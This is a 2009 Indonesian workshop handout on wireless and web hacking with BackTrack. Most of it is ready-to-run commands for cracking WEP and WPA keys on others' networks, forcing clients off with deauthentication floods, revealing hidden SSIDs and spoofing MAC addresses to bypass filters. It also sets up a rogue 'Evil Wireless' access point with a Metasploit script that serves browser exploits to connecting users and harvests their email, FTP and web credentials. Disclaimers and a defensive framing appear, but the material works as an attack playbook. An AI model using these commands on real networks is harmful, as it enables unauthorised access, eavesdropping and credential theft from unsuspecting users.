materi workshop wifi hacking with backtrack unair des 2009
TRANSCRIPT
Wireless Hacking, Web Hacking
&
Security System
Oleh :
Nathan Gusti Ryan
We give you Solution with our eXPerience We give you Solution with our eXPerience We give you Solution with our eXPerience We give you Solution with our eXPerience
IT Training – Software – Hardware – Technical Support – Networking – Server System
Website : www.xp-solution.com Email : [email protected]
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
About Workshop Wifi Hacking
Materi ini merupakan kelanjutan dari Seminar “Networking Security” yang dibawakan oleh Pakar IT Nasional
Bpk Onno. W. Purbo di Universitas Airlangga tanggal 29 November 2009. Materi Wifi Hacking ini sebagai
Workshop dari Demo yang dibawakan dalam Seminar tersebut.
Workshop atau Pelatihan Hacking bertujuan untuk mempelajari dan mendalami serta mempaktekkan System
Kerja atau Teknik Kerja seorang Hacker dalam menemukan celah keamanan atau Hole security suatu jaringan
wireless milik orang lain. Pengetahuan dan wawasan tentang Wifi Hacking ini diharapkan dapat menjadi
pengetahuan peserta workshop sehingga mampu menutup celah keamanan yang dapat diterobos oleh hacker
atau oleh orang lain sehingga Wireless Network atau Jaringan kerja yang dibangunnya betul – betul jaringan
yang kuat proteksi keamanannya.
Simplenya adalah cara menjadi seorang polisi yang handal tentu harus memahami berbagai teknik kejahatan
yang dilakukan oleh penjahat yang handal. Sehingga mampu memberikan perlindungan dan menjaga
keamanan serta mampu meng-identifikasikan + menangkal + menangkap penjahat tersebut.
Dalam Workshop ini di focuskan pada pengunaan Linux BackTrack, baik BackTrack versi 4 maupun BackTrack
versi 3 Bootable USB Flashdisk. BackTrack @ Flasdisk sangat simple dan praktis sehingga dapat digunakan
setiap saat tanpa menganggu OS Laptop yang kita gunakan.
About Internet & Websites Hacking
Materi Workshop Hacking ini sebagai preview adanya berbagai celah keamanan yang memungkinkan sebuah
websites dapat di ambil alih oleh orang lain dengan SQL Injection yang memanfaatkan paramater dari
Database SQL sehingga hacker dapat memperoleh Username + Password ADMIN atau meng-“inject” Username
+ Password yang dapat menguasai websites tersebut.
Carding dan SQL Injection Database Hacking
eCommerce yang semakin berkembang dalam transaksi perdagangan via internet yang menjadikan eMoney
atau Virtual Money semakin diminati dan terus melejit semacam Paypal karena banyak dibutuhkan dalam
bisnis di internet. Begitu juga transaksi mengunakan Kartu Kredit yang memungkinkan adanya celah keamanan
dalam eCommerce sehingga para pemain bisnis internet harus lebih waspada. Hal inilah yang mengharuskan
setiap orang memahami adanya berbagai Teknik Carding maupun SQL Injection terhadap data transaksi
sehingga dapat merugikan pihak lain.
By Nathan Gusti Ryan
http://artikel.xcode.or.id # http://jamesbond.xcode.or.id
www.xp-solution.com
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Joomla Hacking
Joomla Click Jacking adalah berbagai Trik yang memungkinkan menjadi hole dari websites yang dibangun
dengan Websites Joomla CMS sehingga berbagai hal yang dapat menembus Administrator Joomla.
Membuat BackTrack Bootable USB FD
Cara membuat Bootable USB FD sangat lah mudah.
1. Buka File ISO BackTrack USB dengan MagicISO atau PowerISO.
2. Copy-kan semua file dari ISO tersebut ke sebuah Flashdisk 1 GB Format yang telah di format.
3. Keluar dari program MagicISO atau PowerISO lalu buka flashdisk tersebut dengan Windows Explorer.
4. Jalankan file “BOOTINST.BAT”, dan setelah selesai maka Bootable Flashdisk siap digunakan.
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
TAHAPAN WIFI HACKING
Tahapan yang harus dilakukan untuk Hacking Wifi adalah sbb :
1. AirMonitoring / AirScanning.
2. AirCapturing / AiroDump.
3. AirCracking.
4. AirConnecting.
5. AddOn : Mac Clonning.
Pertama kita cek dulu status driver wifi kita dengan perintah "airmon-ng"
Fungsinya untuk => cek wifi device & driver
Terlihat driver wireless adapter kita sebagai wifi0. Selanjutnya kita jika ada interface lain seperti ath0, kita
hapus dengan perintah "airmon-ng stop ath0"
Fungsinya untuk => menghentikan koneksi eksisting dan virtual driver interface wifi ath0
Selanjutnya kita cek lagi driver wifi yang masih eksis dengan perintah "airmon-ng"
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Sekarang kita akan buat virtual wifi interface dengan perintah "airmon-ng start wifi0"
Fungsinya untuk => menciptakan sebuah virtual wifi interface dari wireless interface wifi0
Nah setelah tercipta virtual wifi interface dengan nama ath0, maka selanjutnya kita akan melakukan scanning
wifi network yang ada disekitar kita dengan perintah "airodump-ng ath0"
Fungsinya untuk => perintah untuk melakukan scanning wifi network yg ada disekitar kita.
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Selanjutnya muncul daftar Wifi Network / BSSID, Power, Mac Address AP / ESSID, Channel yang digunakan
masing2 AP, Bandwith Speed, Jenis Enkripsi (WEP, OPN, WPA, WPA2), Jenis Authentikasi (PSK, TKIP), Nama
Wifi Network / ESSID.
=> Serta muncul muncul Mac Address ESSID dan Mac Address Station / Client yg sedang Connect
#airodump-ng ath0
CH 7 ] [ Elapsed: 16 s ] [ 2009-12-01 18:31
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1E:E5:99:E1:3E 47 5 0 0 13 54. WPA2 CCMP PSK BhiNetwork-Linksys-IT 00:1A:70:95:AB:1A 19 25 0 0 6 54. WPA TKIP PSK BhiNetwork-Linksys 00:C0:02:FF:F1:AC 59 34 18 0 1 11 WEP WEP FREE-HOTSPOT
BSSID STATION PWR Rate Lost Packets Probes
00:C0:02:FF:F1:AC 00:1D:0F:BA:DA:2D 54 0-11 0 1 FREE-HOTSPOT
=> perintah ini untuk melakukan proses scanning wifi network channel 1 / airodump serta mencatat semua
paket data di channel 1 tsb.
#airodump-ng --channel 1 --bssid 00:11:22:33:44:55 -w hasilcap ath0
--channel 1 => Channel yang ditampilkan
--bssid 00:11:22:33:44:55 => Mac Address dari AP yang ditampilkan
-w hasilcap => file output dari hasil scanning
ath0 => virtual wifi interface
--ivs => format penyimpanan hasil capture sebagai file ivs
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 #aircrack-ng hasilcap.cap
Fungsinya => untuk menganalisa hasil capture packet dari airdump.
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 Kita juga bisa melakukan monitoring jaringan wireless ini mengunakan Kismet
Selanjutnya kita akan melihat Client yang terkoneksi ke Access Point ini :
Tekan space
S - untuk men-sort
S - untuk men-sort terhadap SSID
Tekan Panah Bawah - Letakan di SSID AP yang kita inginkan.
ENTER - detail AP
C - lihat siapa saja client AP tersebut
Selanjutnya akan terlihat daftar Client seperti dibawah ini :
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 AIREPLAY
bt ~ # aireplay-ng Aireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'Otreppe Original work: Christophe Devine http://www.aircrack-ng.org usage: aireplay-ng <options> <replay interface> Filter options: -b bssid : MAC address, Access Point -d dmac : MAC address, Destination -s smac : MAC address, Source -m len : minimum packet length -n len : maximum packet length -u type : frame control, type field -v subt : frame control, subtype field -t tods : frame control, To DS bit -f fromds : frame control, From DS bit -w iswep : frame control, WEP bit -D : disable AP detection Replay options: -x nbpps : number of packets per second -p fctrl : set frame control word (hex) -a bssid : set Access Point MAC address -c dmac : set Destination MAC address -h smac : set Source MAC address -g value : change ring buffer size (default: 8) -F : choose first matching packet Fakeauth attack options: -e essid : set target AP SSID -o npckts : number of packets per burst (0=auto, default: 1) -q sec : seconds between keep-alives -y prga : keystream for shared key auth Arp Replay attack options: -j : inject FromDS packets Fragmentation attack options: -k IP : set destination IP in fragments -l IP : set source IP in fragments Test attack options: -B : activates the bitrate test source options: -i iface : capture packets from this interface -r file : extract packets from this pcap file attack modes (Numbers can still be used): --deauth count : deauthenticate 1 or all stations (-0)
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 --fakeauth delay : fake authentication with AP (-1) --interactive : interactive frame selection (-2) --arpreplay : standard ARP-request replay (-3) --chopchop : decrypt/chopchop WEP packet (-4) --fragment : generates valid keystream (-5) --caffe-latte : query a client for new IVs (-6) --cfrag : fragments against a client (-7) --test : tests injection and quality (-9) --help : Displays this usage screen ############
#aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 01:12:23:34:45:56 ath0
-b => MAC AP / BSSID
-h => MAC Source / MAC Wifi kita
-c / -d => MAC Client / Destination
ath0 => virtual wifi interface
Fungsinya => Untuk mempercepat proses pengiriman packet data dari Client ke AP
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Deauthentikasi Aireplay :
Fungsinya => Untuk menghentikan koneksi dari Client ke AP sehingga Airdump dapat melakukan capture dari
koneksi awal dari Client ke AP.
=> (Serangan utk Disconnect & Reconnect koneksi suatu client ke AP)
#aireplay-ng --deauth 10 -a 00:80:48:7E:CC:57 -c 02:19:FC:01:00:C4 ath0
10 => jumlah deauthentikasi / penyerangan yang akan dilakukan
-a => MAC AP
-c => MAC Client / Workstation
Menganti Mac Address Interface Wifi :
bt ~ # macchanger -A wifi0
Current MAC: a2:9b:5c:b2:de:70 (unknown)
Faked MAC: 00:e0:06:6f:d4:da (Silicon Integrated Sys. Corp.)
bt ~ # macchanger -s wifi0
Current MAC: 00:e0:06:6f:d4:da (Silicon Integrated Sys. Corp.)
bt ~ # macchanger -m 00:21:63:ad:7c:3a wifi0
Current MAC: 00:21:63:ad:7c:3b (unknown)
Faked MAC: 00:21:63:ad:7c:3a (unknown)
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Menyambung ke HotSpot Untuk menyambungkan diri ke HotSpot menggunakan text mode. Langkah yang biasa digunakan
1. Scanning frekuensi
# iwlist scanning
2. Set ESSID interface wireless (misalnya eth1) agar sama dengan HotSpot
# iwconfig eth1 essid HotSpotSSID
3. Cek apakah sudah tersambung
# iwconfig eth1
4. Minta IP address ke DHCP Server
# dhclient eth1
Beberapa Cara untuk Cek Sambungan
1. Cek apakah routing ke Internet sudah di berikan oleh DHCP Server. Perhatikan IP gateway untuk tujuan 0.0.0.0 apakah sudah di berikan, menggunakan perintah,
# netstat -nr
2. Ping ke gateway HotSpot
# ping <ip-gateway>
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Scanning HotSpot Scanning Keberadaan HotSpot dapat dilakukan menggunakan text mode.
iwlist
Cara yang paling sederhana adalah menggunakan perintah
# iwlist scanning
Kismet
cara yang lebih rumit menggunakan kismet
# apt-get install kismet # vi /etc/kismet/kismet.conf source=none,none,addme --> source=ipw3945,wlan0,ipwsource source=none,none,addme --> source=zd1211,eth1,zysource source=none,none,addme --> source=ath5k, ath0, athsource
Baca http://www.kismetwireless.net/documentation.shtml untuk melihat source yang dikenali Kismet
# kismet
airodump
Mematikan mode monitor di WLAN interface
# airmon-ng stop wlan0
Mengaktifkan mode monitor di WLAN interface
# airmon-ng start wlan0 1
Akan keluar kira-kira
Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] (monitor mode enabled on mon2) mon0 Intel 3945ABG iwl3945 - [phy0] mon1 Intel 3945ABG iwl3945 - [phy0]
Scanning
# airodump-ng mon0
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Teknik Menjebol WEP Menggunakan Airodump dan Aircrack Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknik berikut ini membutuhkan traffic paket yang sangat besar, biasanya akan mudah dilakukan jika ada yang sedang melakukan transfer file di jaringan HotSpot. Jika tidak ada traffic sama sekali, sampai kapanpun akan susah untuk di crack WEP-nya.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
Misalnya,
BSSID 00:30:4F:4E:2B:50 WIFI 00:11:6b:33:d3:90 CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan di shell
export AP=00:30:4F:4E:2B:50 export WIFI=00:11:6b:33:d3:90 export CHANNEL=1
Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah
airmon-ng start wlan0 1
Biasanya akan tampil kira-kira sebagai berikut
Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] (monitor mode enabled on mon0)
Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.
Jalankan airodump di WLAN mon0
airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0
Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah
airodump-ng --output-format ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0
Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkan proses cracking WEP pastikan kita dapat menangkap lebih dari 5000 paket.
Jalankan aircrack untuk mengcrack WEP
# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs
misalnya
# aircrack-ng -a 1 -e linksys -n 64 hasilcapture-01.ivs # aircrack-ng -a 1 -e $AP -n 64 hasilcapture-01.ivs
Bisa juga menggunakan perintah
# aircrack-ng -a 1 -n 64 hasilcapture-01.ivs
Switch -a 1 digunakan untuk menset aircrack-ng agar meng-crack WEP
Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang sedang transfer file di jaringan HotSpot.
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Teknik Menjebol WEP Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
Misalnya,
BSSID 00:30:4F:4E:2B:50 WIFI 00:11:6b:33:d3:90 CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan
# export AP=00:30:4F:4E:2B:50 # export WIFI=00:11:6b:33:d3:90 # export CHANNEL=1
Teknik mencari data BSSID & CHANNEL di atas menggunakan perintah, misalnya, card WLAN di eth1. Pastikan bahwa eth1 berada pada mode monitor
# iwconfig eth1 mode monitor # iwconfig eth1 # airmon-ng start eth1 # airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1
Teknik selanjutnya membutuhkan kemampuan untuk berasosiasi dengan Access Point, sayangnya biasanya sukar untuk dapat berasosiasi dengan Access Point yang terenkripsi. Jika ada bug di Access Point, kita bisa lakukan fake authentication seolah-olah kita telah bergabung ke Access Point tersebut
# aireplay-ng -1 0 -e ssidaccesspoint -a $AP -h $WIFI eth1
Jika berhasil authentikasi, kita dapat membuat packet palsu yang akan kita gunakan untuk memanipulasi traffic paket yang lewat dari / menuju access point. Perintah yang digunakan adalah
# aireplay-ng -5 -b $AP -h $WIFI eth1
Setelah kita cukup banyak berhasil menangkap paket. Proses cracking WEP dapat dilakukan menggunakan
# aircrack-ng -a 1 -n 64 hasilcapture.ivs
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Teknik Menjebol WPA Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
Menjebol WPA hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa mencoba langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-nya.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
Misalnya,
BSSID 00:30:4F:4E:2B:50 WIFI 00:11:6b:33:d3:90 CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan di shell
export AP=00:30:4F:4E:2B:50 export WIFI=00:11:6b:33:d3:90 export CHANNEL=1
Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah
airmon-ng start wlan0 1
Biasanya akan tampil kira-kira sebagai berikut
Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] (monitor mode enabled on mon0)
Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.
Jalankan airodump di WLAN mon0
airodump-ng -w hasilcapture --bssid $AP --channel $CHANNEL mon0
Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah
airodump-ng --output-format pcap -w hasilcapture --bssid $AP --channel $CHANNEL mon0
Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..
Untuk mempercepat proses gunakan aireplay-ng
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Dimana :
-a MAC AP -c MAC client
Kunci dari proses cracking WPA adalah ketersediaan kamus silahkan di cek ke
http://www.aircrack-ng.org/doku.php?id=faq http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture.
Jalankan aircrack untuk meng-crack WPA
# aircrack-ng -w kamuspass.txt -b 00:14:6C:7E:40:80 psk*.cap -b MAC BSSID
Versi yang lebih panjang
# aircrack-ng -a 2 -e essidapyangakandicrack -n 64 hasilcapture* -w kamuspass.txt # aircrack-ng -a 2 -e linksys -n 64 hasilcapture* -w kamuspass.txt # aircrack-ng -a 2 -e $AP -n 64 hasilcapture* -w kamuspass.txt
Bisa juga menggunakan perintah
# aircrack-ng -a 2 -n 64 hasilcapture* -w kamuspass.txt
Switch -a 2 digunakan untuk menset aircrack-ng agar meng-crack WPA
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Menemukan Hidden SSID Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
Cara yang paling ampuh untuk menemukan Hidden SSID adalah menggunakan kismet
# kismet
Hidden SSID akan berwarna biru dan di tutup oleh tanda <> seperti tampak pada gambar.
tampilan kismet, warna biru adalah Hidden SSID
Bagi anda yang cukup beruntung dapat juga menggunakan cara di bawah ini. Tapi kemungkinan gagal lumayan tinggi.
Pertama, scanning frekuensi pada WLAN di eth1
# airmon-ng stop eth1 # airmon-ng start eth1 # airodump-ng eth1
Jalankan airodump-ng terus menerus di sebuah Windows.
Pada Windows yang lain lakukan aireplay asumsinya AP dengan MAC 00:11:6B:60:86:91 melalui eth1
# aireplay-ng --deauth 1 -a 00:11:6B:60:86:91 eth1
Nanti akan keluar BSSID di airodump-ng
http://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hacking
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Teknik Man-in-The-Middle Attack / FakeAP Contents
1 Versi Singkat membuat Fake AP 2 Versi lengkap untuk MiTM attack 3 Referensi 4 Pranala Menarik
Versi Singkat membuat Fake AP airbase-ng -e "Free WiFi" -P -C 30 -v wlan0
Versi lengkap untuk MiTM attack
Siapkan software yang di butuhkan
sudo apt-get install subversion
Summary perintah yang digunakan
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng cd aircrack-ng/ make make install sudo su - airmon-ng start wlan0 airbase-ng -e "Evil Wireless" -v mon0 & ifconfig at0 10.0.0.1 netmask 255.255.255.0 apt-get install dhcp3-server vi /etc/dhcp3/evil-wireless.conf option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; option domain-name-servers 10.0.0.1; } dhcpd3 -cf /etc/dhcp3/evil-wireless.conf ifconfig mon0 mtu 1800 ifconfig at0 mtu 1400 svn co http://metasploit.com/svn/framework3/trunk msf3 (butuh waktu lama & bandwidth)
Menggunakan gems rupanya rewel & belum stabil :( ..
apt-get install rubygems gem install activerecord sqlite3-ruby (butuh waktu lama & bandwidth) vi evilwireless.rc
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 load db_sqlite3 db_create /root/evilwireless.db use auxiliary/server/browser_autopwn setg AUTOPWN_HOST 10.0.0.1 setg AUTOPWN_PORT 55550 setg AUTOPWN_URI /ads set LHOST 10.0.0.1 set LPORT 45000 set SRVPORT 55550 set URIPATH /ads run use auxiliary/server/capture/pop3 set SRVPORT 110 set SSL false run use auxiliary/server/capture/pop3 set SRVPORT 995 set SSL true run use auxiliary/server/capture/ftp run use auxiliary/server/capture/imap set SSL false set SRVPORT 143 run use auxiliary/server/capture/imap set SSL true set SRVPORT 993 run use auxiliary/server/capture/smtp set SSL false set SRVPORT 25 run use auxiliary/server/capture/smtp set SSL true set SRVPORT 465 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 5353 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 53 run use auxiliary/server/capture/http set SRVPORT 80 set SSL false run use auxiliary/server/capture/http set SRVPORT 8080
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009 set SSL false run use auxiliary/server/capture/http set SRVPORT 443 set SSL true run use auxiliary/server/capture/http set SRVPORT 8443 set SSL true run ./msfconsole -r evilwireless.rc
Referensi
http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-tutorial.html
http://0x80.org/blog/?p=131 - The Evil Access Point http://forums.remote-exploit.org/wireless/23886-tutorial-how-create-fake-ap-auto-bash-script.html -
How to create Face AP http://ww2.mastaputa.com:9999/?p=29 http://fix-vista.com/windows-vista-installation-setup/fishing-windows-clients-with-airbase-ng-and-
airchat
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Teknik Melewati Pembatasan MAC Address Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.
Sebagian AP akan memfilter MAC address client. Teknik menemukan MAC address client yang di ijinkan lewat oleh AP menggunakan Kismet adalah
# kismet
Lakukan
space S - untuk men-sort S - untuk men-sort terhadap SSID Panah Bawah - Letakan di SSID AP yang kita inginkan. ENTER - detail AP C - lihat siapa saja client AP tersebut
Pastikan airmon tidak aktif di WLAN eth1
# airmon-ng stop eth1
Untuk mengubah MAC address dari WLAN di eth1 menjadi sama dengan MAC address client yang diijinkan AP
# ifconfig eth1 down # ifconfig eth1 hw ether 00:16:CF:C1:FA:F5 # ifconfig eth1 up
Alternatif lain
# ifconfig eth1 down # macchanger -mac 00:16:CF:C1:FA:F5 eth1 # ifconfig eth1 up
atau untuk random MAC address
# macchanger -r eth1
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Aplikasi Yang Perlu Disiapkan Beberapa paket software yang dibutuhkan : # apt-get install gcc g++ linux-kernel-headers libpcap0.8 libpcap0.8-dev libnet1 libnet1-dev libdnet \ libdnet-dev subversion python2.4 python2.4-dev python-pyx python-crypto python-psyco dhcp3-server bind9 apache2
Install beberapa aplikasi yang lebih fokus untuk hacking wireless # apt-get install kismet scapy macchanger ettercap dsniff aircrack-ng
Pada Ubuntu 9.04 aplikasi yang di instalasi adalah # apt-get install kismet python-scapy macchanger ettercap dsniff aircrack-ng
Download source code aplikasi berikut jika diperlukan # cd /usr/local/src # svn co https://802.11ninja.net/svn/lorcon/trunk lorcon # wget http://download.aircrack-ng.org/aircrack-ng-0.9.3.tar.gz # wget http://sid.rstack.org/code/wifitap/wifitap-0.4.0.tgz # wget http://easynews.dl.sourceforge.net/sourceforge/airpwn/airpwn-1.30.tgz
Bagi pengguna Atheros & RT73 perlu mendownload # wget http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r2277-20070414.tar.gz # wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-1.6.1.tar.bz2 # wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-1.1.0.tar.bz2
Compile & Install Lorcon # cd /usr/local/src/lorcon/ # ./configure \ -prefix=/usr \ -sysconfdir=/etc/lorcon \ -localstatedir=/var \ -mandir=/usr/share/man\ -infodir=/usr/share/info # make # make install
Sebaiknya di lakukan melalui airpwn seperti di bawah ini, Compile & Install Airpwn # cd /usr/local/src/ # tar zxvf airpwn-1.3.tgz # cd /usr/local/src/airpwn-1.3 # tar zxvf lorcon-current.tgz # cp -Rf /usr/local/src/lorcon/* /usr/local/src/airpwn-1.3/lorcon # cd /usr/local/src/airpwn-1.3/lorcon # ./configure \ -prefix=/usr \ -sysconfdir=/etc/lorcon \ -localstatedir=/var \ -mandir=/usr/share/man\ -infodir=/usr/share/info # make # make install
Langkah selanjutnya kita perlu menginstall source code kernel:( ... # cd /usr/local/src/airpwn-1.3 # ./configure # make # make install
Install Wifitap & Airsnarf # cd /usr/local/src/ # tar zxvf wifitap-0.4.0.tgz
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN – ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Instalasi Driver MadWiFi Bagi anda yang menggunakan chipset Atheros tampaknya perlu menginstalasi driver MadWiFi.
Instalasi kebutuhan untuk compile
# apt-get install build-essential perl
Download source code madwifi dari
http://ath5k.org/wiki/MadWifi http://sourceforge.net/project/showfiles.php?group_id=82936
Copy dan buka source code
# cp madwifi-0.9.4.tar.gz /usr/local/src/ # cd /usr/local/src # tar zxvf madwifi-0.9.4.tar.gz # cd /usr/local/src/madwifi-0.9.4
Compile & Install MadWifi Driver
# make # make install
Load module
# modprobe ath_pci Source : http://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hacking (CL) Onno W. Purbo